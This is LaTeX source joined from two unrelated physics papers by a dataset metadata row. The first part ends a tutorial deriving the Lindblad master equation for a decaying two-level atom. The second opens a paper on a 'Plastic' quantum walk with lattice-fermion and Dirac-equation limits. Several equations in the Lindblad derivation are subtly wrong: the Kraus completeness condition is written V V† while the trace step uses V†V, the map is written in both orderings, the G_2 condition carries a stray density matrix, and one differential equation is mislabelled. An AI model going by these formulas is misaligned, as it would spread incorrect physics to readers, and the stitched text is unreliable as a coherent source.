Thanks to Choi's Theorem, we know the general form of CP-maps, but there is still an issue to address. As density matrices should have trace one, we need to require any physical maps to be also trace-preserving. This requirement gives as a new constraint that completely defines all CPT-maps. This requirement comes from the following theorem.
\vspace{0.5cm}
\begin{theorem}
Choi-Kraus' Theorem.
\noindent
A linear map ${\cal V}:B({\cal H})\to B({\cal H})$ is completely positive and trace-preserving iff it can be expressed as
\begin{equation}
{\cal V}\rho=\sum_l V_l^\dagger \rho V^{\phantom{\dagger}}_l
\label{eq:choi2}
\end{equation}
with $V_l\in B({\cal H})$ fulfilling
\begin{equation}
\sum_l V^{\phantom{\dagger}}_l V_l^\dagger=\mathbb 1_{{\cal H}}.
\label{eq:krauss}
\end{equation}
\end{theorem}
\vspace{0.5cm}
\noindent
\textbf{Proof.}
\noindent
We have already proved that this is a completely positive map, we only need to prove that it is also trace-preserving and that all trace preserving-maps fulfil Eq. (\ref{eq:krauss}). The `if' proof is quite simple by applying the cyclic permutations and linearity properties of the trace operator.
\begin{equation}
\textrm{Tr}\cor{{\cal V}\rho}=\textrm{Tr} \cor{ \sum_{l=1}^{d^2-1} V^{\phantom{\dagger}}_l\rho V_l^\dagger } = \textrm{Tr} \cor{ \pare{\sum_{l=1}^{d^2-1} V_l^\dagger V^{\phantom{\dagger}}_l }\rho } =\textrm{Tr}\cor{\rho}.
\end{equation}
We have to prove also that any map in the form (\ref{eq:choi2}) is trace-preserving only if the operators $V_l$ fulfil (\ref{eq:krauss}). We start by stating that if the map is trace-preserving by applying it to an any arbitrary element of a basis of ${\cal B}\pare{{\cal H}}$ we should obtain
\begin{equation}
\textrm{Tr}\cor{{\cal V} \pare{\op{i}{j}}}=\textrm{Tr} \cor{\op{i}{j}}=\delta_{i,j}.
\end{equation}
As the map has a form given by (\ref{eq:choi2}) we can calculate this same trace in an alternative way.
\begin{eqnarray}
\textrm{Tr}\cor{{\cal V} \pare{\op{i}{j}}} &=& \textrm{Tr} \cor{ \sum_{l=1}^{d^2-1} V^{\phantom{\dagger}}_l \op{i}{j} V_l^\dagger }
= \textrm{Tr} \cor{ \sum_{l=1}^{d^2-1} V_l^\dagger V^{\phantom{\dagger}}_l \op{i}{j} } \nonumber \\
&= &\sum_{k} \bra{k} \pare{ \sum_{l=1}^{d^2-1} V_l^\dagger V^{\phantom{\dagger}}_l \op{i}{j} } \ket{k}
= \bra{j} \pare{\sum_{l=1}^{d^2-1} V_l^\dagger V^{\phantom{\dagger}}_l }\ket{i},
\end{eqnarray}
where $\left\{ \ket{k} \right\}$ is an arbitrary basis of ${\cal H}$.
As both equalities should be right we obtain
\begin{equation}
\bra{j} \pare{\sum_{l=1}^{d^2-1} V^{\phantom{\dagger}}_l V^\dagger_l }\ket{i} = \delta_{i,j},
\end{equation}
and therefore, the condition (\ref{eq:krauss}) should be fulfilled.
\vspace{0.25 cm}
\noindent
\textbf{End of the proof.}
\vspace{0.5cm}
\noindent
Operators $V_i$ of a map fulfilling condition (\ref{eq:krauss}) are called {\it Krauss operators}. Because of that, sometimes CPT-maps are also called {\it Krauss maps}, especially when they are presented as a collection of Krauss operators. Both concepts are ubiquitous in quantum information science. Krauss operators can also be time-dependent as long as they fulfil relation (\ref{eq:krauss}) for all times.
At this point, we already know the form of CPT-maps, but we do not have a master equation, that is a continuous set of differential equations. This means that we know how to perform an arbitrary operation in a system, but we do not have an equation to describe its time evolution. To do so, we need to find a time-independent generator ${\cal L}$ such that
\begin{equation}
\frac{d}{dt} \rho\pare{t}= {\cal L}\rho(t),
\label{eq:difeq}
\end{equation}
and therefore our CPT-map could be expressed as ${\cal V}(t)=e^{{\cal L} t}$. The following calculation is about founding the explicit expression of ${\cal L}$. We start by choosing an orthonormal basis of the bounded space of operators ${\cal B}({\cal H})$, $\key{F_i}_{i=1}^{d^2}$. To be orthonormal it should satisfy the following condition
\begin{equation}
\bbracket{F_i}{F_j}\equiv \textrm{Tr}\cor{F_i^\dagger F_j}=\delta_{i,j}.
\label{eq:orthonormal}
\end{equation}
Without any loss of generality, we select one of the elements of the basis to be proportional to the identity, $F_{d^2}=\frac{1}{\sqrt{d}} \mathbb 1_{{\cal H}}$. It is trivial to prove that the norm of this element is one, and it is easy to see from Eq. (\ref{eq:orthonormal}) that all the other elements of the basis should have trace zero.
\begin{equation}
\textrm{Tr}\cor{F_i}=0 \qquad \forall i=1,\dots,d^2-1.
\end{equation}
The closure relation of this basis is $\mathbb 1_{{\cal B}({\cal H})}=\sum_i \bproj{F_i}{F_i}$. Therefore, the Krauss operators can be expanded in this basis by using the Fock-Liouville notation
\begin{equation}
V_l(t)= \sum_{i=1}^{d^2} \bbracket{F_i}{V_l(t)} \kket{F_i}.
\label{eq:kraussexpansion}
\end{equation}
As the map ${\cal V}(t)$ is in the form (\ref{eq:choimap}) we can apply (\ref{eq:kraussexpansion}) to obtain\footnote{ For simplicity, in this discussion we omit the explicit time-dependency of the density matrix.}.
\begin{equation}
\hspace{-2cm}
{\cal V}(t) \rho = \sum_l\cor{\sum_{i=1}^{d^2} \bbracket{F_i}{V_l(t)} F_i \;\rho \sum_{j=1}^{d^2} F_j^\dagger \bbracket{V_l(t)}{F_j}}
= \sum_{i,j=1}^{d^2} c_{i,j}(t) F_i^{\phantom{\dagger}}\rho F_j^{\dagger},
\end{equation}
where we have absorved the sumation over the Krauss operators in the terms $c_{i,j}(t)= \sum_l \bbracket{F_i}{V_l} \bbracket{V_l}{F_j}$. We go back now to the original problem by applying this expansion into the time-derivative of Eq. (\ref{eq:difeq})
\begin{eqnarray}
\frac{d \rho }{dt} &=&\lim_{\Delta t\to0} \frac{1}{\Delta t} \pare{{\cal V}(\Delta t)\rho-\rho}
= \lim_{\Delta t\to 0} \pare{\sum_{i,j=1}^{d^2} c_{i,j}(\Delta t) F_i^{\phantom{\dagger}} \rho F_j^\dagger - \rho} \nonumber\\
&=& \lim_{\Delta t\to 0} \left( \sum_{i,j=0}^{d^2-1} c_{i,j}(\Delta t) F_i^{\phantom{\dagger}}\rho F_j^\dagger + \sum_{i=1}^{d^2-1} c_{i,d^2} F_i^{\phantom{\dagger}}\rho F_{d^2}^\dagger \right. \nonumber\\
&&\left. + \sum_{j=1}^{d^2-1} c_{d^2,j} (\Delta t) F_{d^2}^{\phantom{\dagger}} \rho F_j^\dagger + c_{d^2,d^2}(\Delta t) F_{d^2}^{\phantom{\dagger}} \rho F_{d^2}^\dagger - \rho \right),
\end{eqnarray}
where we have separated the summations to take into account that $F_{d^2}=\frac{1}{\sqrt{d}}\mathbb 1_{{\cal H}}$. By using this property this equation simplifies to
\begin{eqnarray}
\frac{d \rho}{dt} &=&\lim_{\Delta t\to0} \frac{1}{\Delta t} \left( \sum_{i,j=1}^{d^2-1} c_{i,j}(\Delta t) F_i^{\phantom{\dagger}} \rho F_j^\dagger + \frac{1}{\sqrt{d}} \sum_{i=1}^{d^2-1}
c_{i,d^2}(\Delta t) F_i^{\phantom{\dagger}}\rho \right. \nonumber\\
&+&\left. \frac{1}{\sqrt{d}} \sum_{j=1}^{d^2-1} c_{d^2,j} (\Delta t) \rho F_j^\dagger + \frac{1}{d} c_{d^2,d^2}(\Delta t) \rho-\rho \right).
\label{eq:derivative2}
\end{eqnarray}
The next step is to eliminate the explicit dependence with time. To do so, we define new constants to absorb all the time intervals.
\begin{eqnarray}
g_{i,j}&\equiv& \lim_{\Delta t\to 0} \frac{c_{i,j} (\Delta t) }{\Delta t} \qquad (i,j<d^2), \nonumber\\
g_{i,d^2}&\equiv& \lim_{\Delta t \to 0} \frac{c_{i,d^2} (\Delta t) }{\Delta t} \qquad (i<d^2), \nonumber\\
g_{d^2,j}&\equiv& \lim_{\Delta t \to 0} \frac{c_{d^2,j} (\Delta t) }{\Delta t} \qquad (j<d^2), \\
g_{d^2,d^2}&\equiv& \lim_{\Delta t\to 0} \frac{c_{d^2,d^2}(\Delta t)-d}{\Delta t}. \nonumber
\end{eqnarray}
Introducing these coefficients in Eq (\ref{eq:derivative2}) we obtain an equation with no explicit dependence in time.
\begin{eqnarray}
\frac{d \rho}{dt} = \sum_{i,j=1}^{d^2-1} g_{i,j} F_i \rho F_j^\dagger + \frac{1}{\sqrt{d}} \sum_{i=1}^{d^2-1} g_{i,d^2} F_i \rho + \frac{1}{\sqrt{d}} \sum_{j=1}^{d^2-1} g_{d^2,j} \rho F_j^\dagger + \frac{g_{d^2,d^2}}{d} \rho.\nonumber \\
\label{eq:derivative3}
\end{eqnarray}
As we are already summing up over all the Krauss operators it is useful to define a new operator
\begin{equation}
F\equiv \frac{1}{\sqrt{d}} \sum_{i=1}^{d^2-1} g_{i,d^2} F_i.
\end{equation}
Applying it to Eq. (\ref{eq:derivative2}).
\begin{equation}
\frac{d \rho}{dt} = \sum_{i,j=1}^{d^2-1} g_{i,j} F_i \rho F_j^\dagger + F \rho + \rho F^\dagger + \frac{g_{d^2,d^2}}{d} \rho.
\label{eq:derivative4}
\end{equation}
At this point, we want to separate the dynamics of the density matrix into a Hermitian (equivalent to von Neunmann equation) and an incoherent part. We split the operator $F$ in two to obtain a Hermitian and anti-Hermitian part.
\begin{equation}
F=\frac{F+F^\dagger}{2} + i\frac{F-F^\dagger}{2i} \equiv G-iH,
\end{equation}
where we have used the notation $H$ for the Hermitian part for obvious reasons. If we take this definition to Eq. (\ref{eq:derivative4}) we obtain
\begin{equation}
\frac{d \rho}{dt} = g_{i,j} F_i \rho F_j^\dagger + \key{G,\rho} - i \cor{H,\rho} + \frac{g_{d^2,d^2}}{d} \rho.
\end{equation}
We define now the last operator for this proof, $G_2\equiv G+\frac{g_{d^2,d^2}}{2d}$, and the expression of the time derivative leads to
\begin{equation}
\frac{d \rho}{dt} = \sum_{i,j=1}^{d^2-1} g_{i,j} F_i \rho F_j^\dagger + \key{G_2,\rho} -i\cor{H,\rho}.
\end{equation}
Until now we have imposed the complete positivity of the map, as we have required it to be written in terms of Krauss maps, but we have not used the trace-preserving property. We impose now this property, and by using the cyclic property of the trace, we obtain a new condition
\begin{equation}
\textrm{Tr}\cor{\frac{d \rho}{dt}}=\textrm{Tr}\cor{ \sum_{i,j=1}^{d^2-1} F_j^\dagger F_i \rho + 2 G_2 \rho }=0.
\end{equation}
Therefore, $G_2$ should fulfil
\begin{equation}
G_2=\frac{1}{2} \sum_{i,j=1}^{d^2-1} g_{i,j} F_j^\dagger F_i\rho.
\end{equation}
By applying this condition, we arrive at the Lindblad master equation
\begin{equation}
\frac{d \rho}{dt}= -i\cor{H,\rho} + \sum_{i,j=1}^{d^2-1} g_{i,j} \pare{ F_i^{\phantom{\dagger}}\rho F_j^\dagger - \frac{1}{2} \key{F_j^\dagger F_i^{\phantom{\dagger}},\rho }}.
\end{equation}
Finally, by definition the coefficients $g_{i,j}$ can be arranged to form a Hermitian, and therefore diagonalisable, matrix. By diagonalising it, we obtain the diagonal form of the Lindblad master equation.
\begin{equation}
\frac{d}{dt} \rho= -i \cor{H,\rho} + \sum_{k} \Gamma_k \pare{ L_k^{\phantom{\dagger}} \rho L_k^\dagger - \frac{1}{2} \key{L_k^{\phantom{\dagger}} L_k^\dagger,\rho}} \equiv {\cal L} \rho.
\label{eq:lindblad}
\end{equation}
\subsection{Properties of the Lindblad Master Equation}
Some interesting properties of the Lindblad equation are:
\begin{itemize}
\item Under a Lindblad dynamics, if all the jump operators are Hermitian, the purity of a system fulfils $\frac{d}{dt}\pare{ \textrm{Tr} \cor{\rho^2 }} \le 0$. The proof is given in \ref{sec:purity}.
\item The Lindblad Master Equation is invariant under unitary transformations of the jump operators
\begin{equation}
\sqrt{\Gamma_i} L_i\to \sqrt{\Gamma'_i} L_i'= \sum_j v_{ij} \sqrt{\Gamma_j} L_j,
\end{equation}
with $v$ representing a unitary matrix. It is also invariant under inhomogeneous transformations in the form
\begin{eqnarray}
L_i &\to& L'_i= L_i + a_i \nonumber\\
H&\to& H'=H+\frac{1}{2i} \sum_j \Gamma_j \pare{a_j^* A_j - a_j A_j^\dagger }+ b,
\end{eqnarray}
where $a_i \in \mathbb{C}$ and $b \in \mathbb{R}$. The proof of this can be found in Ref. \cite{breuer_02} (Section 3).
\item Thanks to the previous properties it is possible to find traceless jump operators without loss of generality.
\end{itemize}
\newpage
\vspace{0.5cm}
\begin{center}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 6. A master equation for a two-level system with decay.}
\vspace{0.25cm}
Continuing our example of a two-level atom, we can make it more realistic by including the possibility of atom decay by the emission of a photon. This emission happens due to the interaction of the atom with the surrounding vacuum state\footnote{This is why atoms decay.}. The complete quantum system would be in this case the `atom+vacuum' system and its time evolution should be given by the von Neumann equation (\ref{eq:vne}), where $H$ represents the total `atom+vacuum' Hamiltonian. This system belongs to an infinite-dimension Hilbert space, as the radiation field has infinite modes. If we are interested only in the time dependence state of the atom, we can derive a Markovian master equation for the reduced density matrix of the atom (see for instance Refs. \cite{breuer_02,gardiner_00}). The master equation we will study is
\begin{eqnarray}
\frac{d}{dt}\rho(t) = -i\cor{H,\rho} + \Gamma \left( \sigma^- \rho \sigma^+ -\frac{1}{2} \left\{\sigma^+ \sigma^-,\rho \right\} \right),
\label{eq:lindtotal}
\end{eqnarray}
where $\Gamma$ is the coupling between the atom and the vacuum.
In the Fock-Liouvillian space (following the same ordering as in Eq. (\ref{eq:denmat})) the Liouvillian corresponding to evolution (\ref{eq:lindtotal}) is
\begin{equation}
{\cal L}=
\left(
\begin{array}{cccc}
0 & i \Omega & -i\Omega & \Gamma \\
i\Omega & -i E - \frac{\Gamma}{2} & 0 & -i\Omega\\
-i\Omega & 0 & -i E -\frac{\Gamma}{2} & i\Omega \\
0 & -i\Omega & i\Omega & -\Gamma \\
\end{array}
\right).
\label{eq:liou2}
\end{equation}
Expressing explicitly the set of differential equations we obtain
\begin{eqnarray}
\dot{\rho}_{00} &= & i \Omega \rho_{01} -i\Omega \rho_{10} + \Gamma \rho_{11} \nonumber \\
\dot{\rho}_{01} &=& i\Omega \rho_{00} - \pare{ iE - \frac{\Gamma}{2} } \rho_{01} -i\Omega \rho_{11} \nonumber\\
\dot{\rho}_{10} &=& -i\Omega \rho_{00} \pare{ -i E - \frac{\Gamma}{2}} \rho_{10} + i\Omega \rho_{11} \\
\dot{\rho}_{10} &=& -i\Omega \rho_{01} + i\Omega \rho_{10} -\Gamma \rho_{11} \nonumber
\end{eqnarray}
\vspace{0.25cm}
\label{minipage5}
\end{minipage}
}
\end{center}
\vspace{0.5cm}
\newpage
\section{Resolution of the Lindblad Master Equation}
\label{sec:resolution}
\subsection{Integration}
To calculate the time evolution of a system determined by a Master Equation in the form (\ref{eq:lindtotal}) we need to solve a set of equations with as many equations as the dimension of the density matrix. In our example, this means to solve a 4 variable set of equations, but the dimension of the problem increases exponentially with the system size. Because of this, for bigger systems techniques for dimension reduction are required.
To solve systems of partial differential equations there are several canonical algorithms. This can be done analytically only for a few simple systems and by using sophisticated techniques as damping bases \cite{briegel:pra93}. In most cases, we have to rely on numerical approximated methods. One of the most popular approaches is the $4^{th}$-order Runge-Kutta algorithm (see, for instance, \cite{numericalrecipes} for an explanation of the algorithm). By integrating the equations of motion, we can calculate the density matrix at any time $t$.
The steady-state of a system can be obtained by evolving it for a long time $\pare{t \rightarrow \infty}$. Unfortunately, this method presents two difficulties. First, if the dimension of the system is big, the computing time would be huge. This means that for systems beyond a few qubits, it will take too long to reach the steady-state. Even worse is the problem of stability of the algorithms for integrating differential equations. Due to small errors in the calculation of derivatives by the use of finite differences, the trace of the density matrix may not be constantly equal to one. This error accumulates during the propagation of the state, giving non-physical results after a finite time. One solution to this problem is the use of algorithms specifically designed to preserve the trace, as Crank-Nicholson algorithm \cite{goldberg:ajp67}. The problem with this kind of algorithms is that they consume more computational power than Runge-Kutta, and therefore they are not useful to calculate the long-time behaviour of big systems. An analysis of different methods and their advantages and disadvantages can be found at Ref. \cite{riesch:jcp19}.
\vspace{.35cm}
\begin{center}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 7. Time dependency of the two-level system with decay.}
\vspace{0.25cm}
In this box we show some results of solving Eq (\ref{eq:lindtotal}) and calculating the density matrix as a function of time. A Mathematica notebook solving this problem can be found at \cite{notebook}. To illustrate the time behaviour of this system, we calculate the evolution for different state parameters. In all cases, we start with an initial state that represents the state being excited $\rho_{11}=1$, with no coherence between different states, meaning $\rho_{01}=\rho_{10}=0$. If the decay parameter $\Gamma$ is equal to zero, the problem reduces to solve von Neumann equation, and the result is displayed in Figure \ref{figure1}. The other extreme case would be a system with no coherent dynamics ($\Omega=0$) but with decay. In this case, we observe an exponential decay of the population of the excited state. Finally, we can calculate the dynamics of a system with both coherent driving and decay. In this case, both behaviours coexist, and there are oscillations and decay.
\begin{center}
\includegraphics[scale=.5]{figure2}
\includegraphics[scale=.5]{figure3}
\captionof{figure}{Left: Population dynamics under a pure incoherent dynamics ($\Gamma=0.1,\; n=1,\; \Omega=0,\; E=1$). Right: Population dynamics under both coherent and incoherent dynamics ($\Gamma=0.1,\; n=1,\; \Omega=1,\; E=1)$. In both the blue lines represent $\rho_{11}$ and the orange one $\rho_{00}$.}
\end{center}
\vspace{0.1cm}
\end{minipage}
\label{minipage6}
}
\end{center}
\newpage
\subsection{Diagonalisation}
As we have discussed before, in the Fock-Liouville space the Liouvillian corresponds to a complex matrix (in general complex, non-hermitian, and non-symmetric). By diagonalising it we can calculate both the time-dependent and the steady-state of the density matrices. For most purposes, in the short time regime integrating the differential equations may be more efficient than diagonalising. This is due to the high dimensionality of the Liouvillian that makes the diagonalisation process very costly in computing power. On the other hand, in order to calculate the steady-state, the diagonalisation is the most used method due to the problems of integrating the equation of motions discussed in the previous section.
Let see first how we use diagonalisation to calculate the time evolution of a system. As the Liouvillian matrix is non-Hermitian, we cannot apply the spectral theorem to it, and it may have different left and right eigenvectors. For a specific eigenvalue $\Lambda_i$ we can obtain the eigenvectors $\kket{\Lambda_i^R}$ and $\kket{\Lambda_i^L}$ s. t.
\begin{eqnarray}
\hspace{2cm}
\tilde{{\cal L}} \; \kket{\Lambda_i^R} = \Lambda_i \kket{\Lambda_i^R} \nonumber\\
\hspace{2cm}
\bbra{\Lambda_i^L}\; \tilde{{\cal L}} = \Lambda_i \bbra{\Lambda_i^L}
\end{eqnarray}
An arbitrary system can be expanded in the eigenbasis of $\tilde{{\cal L}}$ as \cite{thingna:sr16,gardiner_00}
\begin{equation}
\kket{\rho(0)}= \sum_i \kket{\Lambda_i^R} \bbracket{\Lambda_i^L}{\rho(0)}.
\end{equation}
Therefore, the state of the system at a time $t$ can be calculated in the form
\begin{equation}
\kket{\rho(t)}= \sum_i e^{\Lambda_i t} \kket{\Lambda_i^R} \bbracket{\Lambda_i^L}{\rho(0)}.
\end{equation}
Note that in this case to calculate the state a time $t$ we do not need to integrate into the interval $\cor{0,t}$, as we have to do if we use a numerical solution of the differential set of equations. This is an advantage when we want to calculate long-time behaviour. Furthermore, to calculate the steady-state of a system, we can look to the eigenvector that has zero eigenvalue, as this is the only one that survives when $t\to\infty$.
For any finite system, Evans' Theorem ensures the existence of at least one zero eigenvalue of the Liouvillian matrix \cite{evans:cmp77,evans:jfa79}. The eigenvector corresponding to this zero eigenvalue would be the steady-state of the system. In exceptional cases, a Liouvillian can present more than one zero eigenvalues due to the presence of symmetry in the system \cite{buca:njp12,manzano:prb14,manzano:av18}. This is a non-generic case, and for most purposes, we can assume the existence of a unique fixed point in the dynamics of the system. Therefore, diagonalising can be used to calculate the steady-state without calculating the full evolution of the system. This can be done even analytically for small systems, and when numerical approaches are required this technique gives better precision than integrating the equations of motion. The spectrum of Liouvillian superoperators has been analysed in several recent papers \cite{albert:pra14,thingna:sr16}.
\newpage
\vspace{0.5cm}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 8. Spectrum-analysis of the Liouvillian for the two-level system with decay.}
Here we diagonalise (\ref{eq:liou2}) and obtain its steady state. A Mathematica notebook solving this problem can be downloaded from \cite{notebook}. This specific case is straightforward to diagonalize as the dimension of the system is very low. We obtain $4$ different eigenvalues, two of them are real while the other two form a conjugated pair. Figure \ref{fig:spectrum} sisplays the spectrum of the superoperator ${\cal L}$ given in (\ref{eq:liou2}).
\begin{center}
\includegraphics[scale=.9]{figure4}
\captionof{figure}{Spectrum of the Liouvillian matrix given by (\ref{eq:liou2}) for the general case of both coherent and incoherent dynamics ($\Gamma=0.2,\; n=1,\; \Omega=0,\; E=1$).}
\label{fig:spectrum}
\end{center}
As there only one zero eigenvalue we can conclude that there is only one steady-state, and any initial density matrix will evolve to it after an infinite-time evolution. By selecting the right eigenvector corresponding to the zero-eigenvalue and normalizing it we obtain the density matrix. This can be done even analytically. The result is the matrix:
\begin{equation}
\rho_{SS}=
\left(
\begin{array}{cc}
\frac{(1+n) \left(4\, E^2+(\Gamma +2 n\, \Gamma )^2\right)+4 (1+2 n) \Omega ^2}{(1+2 n) \left(4 \,E^2+(\Gamma +2 n \,\Gamma )^2+8 \Omega^2\right)} & \frac{2 (-2 \,E-i (\Gamma +2 n \Gamma )) \Omega }{(1+2 n) \left(4 \,E^2+(\Gamma +2 n \,\Gamma )^2+8 \,\Omega ^2\right)} \\
\frac{2 (-2 \,E+i (\Gamma +2 n\, \Gamma )) \Omega }{(1+2 n) \left(4\, E^2+(\Gamma +2 n\, \Gamma )^2+8 \Omega ^2\right)} & \frac{n \left(4E^2+(\Gamma +2 n \Gamma )^2\right)+4 (1+2 n) \Omega ^2}{(1+2 n) \left(4\, E^2+(\Gamma +2 n \Gamma )^2+8\, \Omega ^2\right)} \\
\end{array}
\right)
\end{equation}
\vspace{0.25cm}
\vspace{0.25cm}
\end{minipage}
}
\section{Acknowledgements}
The author wants to acknowledge the Spanish Ministry and the Agencia Espa{\~n}ola de Investigaci{\'o}n (AEI) for financial support under grant
FIS2017-84256-P (FEDER funds).
| 2024-02-18T23:40:08.725Z | 2020-02-06T02:08:32.000Z | algebraic_stack_train_0000 | 1,459 | 13,729 |
|
proofpile-arXiv_065-7145 |
\section{Introduction}
\begin{figure}
{\center
\includegraphics[scale=0.8]{FigUnifiedQW.pdf}
}
\caption{{\em The Plastic QW} admits both a continuous-time discrete-space limit (to lattice fermions) and a continuous-spacetime limit (to the Dirac equation).}
\label{FigUnifiedQW}
\end{figure}
Confronted with the inefficiency of classical computers for simulating quantum particles, Feynman realized that one ought to use quantum computers instead \cite{FeynmanQC}. What better than a quantum system to simulate another quantum system? An important obstacle however is understand to which extent quantum systems can be represented by discrete quantum models. Indeed, whenever we simulate a physical system on a classical computer, we first need a discrete model of the physical system ``in terms of bits'': a simulation algorithm. Similarly, quantum simulation requires a discrete quantum model of the quantum system ``in terms of qubits'': a quantum simulation algorithm.
In the recent years, several such quantum simulation schemes have been devised \cite{JLP14,georgescu2014quantum, QuantumClassicalSim,HamiltonianBasedSchwinger}. Some of which were experimentally implemented \cite{BlattDirac}, including for interacting quantum particles \cite{InnsbruckLGT,ErezCiracLGT}. Most often these discrete models are Hamiltonian-based, meaning that they are discrete-space continuous-time ($\Delta_x\ \textrm{finite},\ \Delta_t\longrightarrow 0$). Their point of departure is always a discrete-space continuous-time reformulation of the target physical phenomena (e.g. the Kogut-Susskind Hamiltonian~\cite{kogut1975hamiltonian} formulation of quantum electrodynamics). Next, they either look for a quantum system in nature that mimics this Hamiltonian, or they perform a staggered trotterization of it in order to obtain unitaries \cite{StrauchCTQW,ArrighiChiral}. But even when the Hamiltonian is trotterized, time steps need remain orders of magnitude smaller than space steps ($\Delta_t\ll\Delta_x$). Thus, in either case, by having first discretized space alone and not time, Hamiltonian-based schemes take things back to the non-relativistic quantum mechanical setting: Lorentz-covariance is broken; the bounded speed of light can only be approximately recovered (via Lieb-Robinson bounds, with issues such as those pointed in \cite{EisertSupersonic,Osborne19}). This also creates more subtle problems such as fermion doubling, where spurious particles are created due to the periodic nature of the momentum space on a lattice.
From a relativistic point of view it would be more natural to discretize space and time right from the start, simultaneously and with the same scale ($\Delta_x=\Delta_t\ \textrm{finite}$). The resulting quantum simulation scheme would then take the form of a network of local quantum gates, homogeneously repeated across space and time---a Quantum Cellular Automata (QCA). \cite{SchumacherWerner,ArrighiUCAUSAL,ArrighiPQCA}. Feynman himself introduced QCA right along with the idea of quantum simulation \cite{FeynmanQCA}. He had pursued similar ideas earlier on in the one-particle sector, with his attractively simple `checkerboard model' of the electron in discrete $(1+1)$--spacetime \cite{Feynman_chessboard}. Later, the one-particle sector of QCA became known as Quantum Walks (QW), and was found to provide quantum simulation schemes for non-interacting fundamental particles \cite{BenziSucci,birula,meyer1996quantum,di2016quantum} in $(3+1)$--spacetime \cite{ArrighiDirac,marquez2017fermion}, be it curved \cite{di2013quantum,ArrighiGRDirac,ArrighiGRDirac3D, mallick2019simulating} or not, or in the presence of an electromagnetic field \cite{MolfettaDebbasch2014Curved, CGW18} or more in general a Yang-Mills interaction \cite{arnault2016quantum}. Some of these were implemented \cite{WernerElectricQW,Sciarrino}. The sense in which QW are Lorentz-covariant was made explicit \cite{ArrighiLORENTZ, PaviaLORENTZ, PaviaLORENTZ2, DebbaschLORENTZ}. The bounded speed of light is very natural in circuit-based quantum simulation, as it is directly enforced by the wiring between the local quantum gates.
Yet, in spite of their many successes, discrete-spacetime models have fallen short of being able to account for realistic interacting QFT so far. The quantum simulation results over the multi-particle sector of QW (namely, QCA) are either abstract (e.g. universality \cite{ArrighiQGOL}) or phenomenological (e.g. molecular binding \cite{ahlbrecht2012molecular,PaviaMolecular}). An exception is a \cite{ArrighiToyQED}, where contact is made with $(1+1)$--QED in two ways : by mimicking its construction and by informally recovering its main phenomenology. All this points out to a core difficulty : there is no clear sense in which discrete-spacetime models of interacting particles have continuum limit ($\Delta_x=\Delta_t\longrightarrow 0$), in fact it is not even clear that interacting QFT themselves have such a continuum limit. In many ways, the classical Lagrangian that serves as departure point of a QFT is but a partial prescription for a numerical scheme (e.g. a regularized Feynman path integral), whose convergence is often challenging (renormalization). Continuous-spacetime does not seem to be the friendly place where QCA and QFT should meet.
Clearly, Hamiltonian-based and QCA-based simulation schemes both have their advantages. It would be nice to have the best of both worlds: a discrete-spacetime model ($\Delta_x=\Delta_t$\ \textrm{finite}) that would be plastic enough to support both a non-relativistic continuous-time discrete-space limit ($\Delta_x$\ \textrm{finite}, $\Delta_t\longrightarrow 0$), in order to establish contact with the discrete-space continuous-time formulation of the QFT, and a fully relativistic spacetime-continuum limit ($\Delta_x=\Delta_t\longrightarrow 0$) limit. For a proof-of-concept we should aim for the free Dirac QFT first, and build a QW that converges both to its continuous-time discrete-space formulation (namely ``Lattice fermions'', i.e. the free part of the Kogut-Susskind Hamiltonian) and to its continuous-spacetime formulation (the Dirac equation). This is exactly what we achieve in this paper.
For our construction, we needed `plasticity', in the sense of a tunable speed of propagation. Indeed intuitively, during the process where the continous-time limit discrete-space is taken, whenever $\Delta_t$ gets halved relative to $\Delta_x$, so is the particle's speed---because it gets half the time to propagate. This in turn is analogous to a change of coordinates, relabelling event $(t,x)$ into $(2t,x)$ in General Relativity. In order to keep physical distances the same, a synchronous metric $g=\textrm{diag}(1,-g_{xx})$ then becomes $g'=\textrm{diag}(1,-4 g_{xx})$ under such a change of coordinates. The original curved Dirac QW \cite{di2013quantum} is precisely able to handle any synchronous metric in the massless case; this was the starting point of our construction. Numerous trial--and--error modifications where needed, however, in order to control the relative scalings of $\Delta_t$ and $\Delta_x$ and in order to handle the mass elegantly. No wonder, therefore, that our result handles the case of curved $(1+1)$--spacetime `for free'. Our QW yields an original curved lattice-fermions Hamiltonian, never appeared in the literature \cite{villegas2015lattice,yamamoto2014lattice}, in the continuous-time discrete-space limit, and the standard curved Dirac equation in the spacetime-limit.
{\em Roadmap.} Section \ref{sec:themodel} presents the QW. Section \ref{sec:limits} shows the different limits it supports (see Fig \ref{FigUnifiedQW}). Section \ref{sec:curved} deals with synchronous curved $(1+1)$--spacetime. Section \ref{sec:qca} promotes the one-particle sector QW, to the many--non--interacting--particles sector, of a QCA. Section \ref{sec:conclusion} summarizes the results, and concludes.
\section{The model}\label{sec:themodel}
We consider a QW over the $(1+1)$--spacetime grid, which we refer to as the `Plastic QW'. Its coin or spin degree of freedom lies $\mathcal{H}_2$, for which we may chose some orthonormal basis $\{\ket{v^-}, \ket{v^+}\}$. The overall state of the walker lies the composite Hilbert space $\mathcal{H}_2\otimes \mathcal{H}_\mathbb{Z}$ and may be thus be written $\Psi=\sum_l \psi^+(l) \ket{v_+}\otimes\ket{l} + \psi^-(l) \ket{v_-}\otimes\ket{l}$, where the scalar field $\psi^+$ (resp. $\psi^-$) gives, at every position $m\in \mathbb{Z}$, the amplitude of the particle being there and about to move left (resp. right). We use $(j,l) \in \mathbb{N} \times \mathbb{Z}$, to label respectively instants and points in space and let:
\begin{equation}
\Psi_{j+2}=W \Psi_j
\label{eq:FDE0}
\end{equation}
where
\begin{equation}
W = \Lambda^{-\kappa} \hat{S}({\hat{C}_{-\zeta}}\otimes \text{Id}_\mathbb{Z}) \hat{S}(\hat{C}_{\zeta}\otimes \text{Id}_\mathbb{Z} )\Lambda^\kappa
\end{equation}
with
$\hat{S}$ a state-dependent shift operator such that
\begin{equation}
(\hat{S}\Psi)_{j,l} =\begin{pmatrix}\psi^+_{j+1,l}\\\psi^-_{j-1,l}\end{pmatrix},
\end{equation}
$\hat{C}_\zeta$ an element of $U(2)$ that depends on angles $\theta$ and $\zeta$,
\begin{equation}
\hat{C}_\zeta= \begin{pmatrix} -\cos \theta & e^{-i \zeta}\sin \theta \\
e^{i \zeta} \sin \theta & \cos \theta
\end{pmatrix}
\end{equation}
